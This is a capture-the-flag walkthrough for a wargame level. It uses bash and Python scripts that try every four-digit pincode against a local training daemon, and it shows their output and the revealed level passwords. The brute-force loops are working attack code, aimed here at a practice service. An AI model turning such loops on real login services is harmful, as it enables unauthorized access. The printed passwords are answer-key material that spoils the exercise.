Level Goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode.
Solution
As the goal states we will need to brute force the pincode in order to retrieve the next password. The ncat tool wasn’t providing the output from the server when the input was being piped in, so we can use the other netcat utility on the system nc. When we pipe in the bandit24 password and a four digit pin we get a welcome message and another message telling us whether it was correct or not. Note the -w flag is used to tell nc to wait one second so we get the full response.
$ echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0000 | nc -w 1 127.0.0.1 30002
^1000
`I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.`
`Wrong! Please enter the correct pincode. Try again.`
$
Iterating through the pincodes manually would be very time consuming so we will write a script to speed things up. The bash script is as follows:
#!/bin/bash
for i in {0000..9999}; do
echo "Trying $i ..."
res="$(echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar $i | nc -w 1 127.0.0.1 30002)"
if ! echo "$res" | grep -o "Wrong"; then
echo "$res"
exit
fi
done
The script iterates through the range of numbers 0000 to 9999 and sends each one to the server listening on port 30002 along with bandit24’s password. The response is then piped through grep to check if it contains the string “Wrong”. The “!” is a negation, so if the string “Wrong” is not in the response, then the full response is printed and the script exits.
$ ./brute.sh
^1000
`Trying 0000 ...`
`Wrong`
`Trying 0001 ...`
`Wrong`
`...`
`Trying 1025 ...`
`I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.`
`Correct!`
`The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d`
$
This script works but because we are having to use the wait flag it increases the runtime of it. We can write a python script to try and speed things up.
#!/usr/bin/env python3
import socket
HOST = "127.0.0.1"
PORT = 30002
passwd = "VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar"
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
# Connect and welcome
s.connect((HOST, PORT))
welcome = s.recv(1024)
print(welcome.decode())
# Brute force pin
for i in range(10000):
print("Trying %04d ..." % i)
p = "%s %04d\n" % (passwd, i)
s.sendall(str.encode(p))
data = s.recv(1024)
if "Wrong" not in data.decode():
print(data.decode())
break
This script creates a socket object and connects to port 30002 on the localhost. It the recieves and prints the welcome message from the server. Next, it iterates through the range of integers 0 to 9999, creates a string with bandit24’s password and the current integer zero padded to four spots (%04d), and send this string to the server. If the string “Wrong” is not in the response recieved then the response is printed and the script exits.
$ ./brute.py
^1000
`Trying 0000 ...`
`Trying 0001 ...`
`...`
`Trying 1025 ...`
`Correct!`
`The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d`
`Exiting.`
$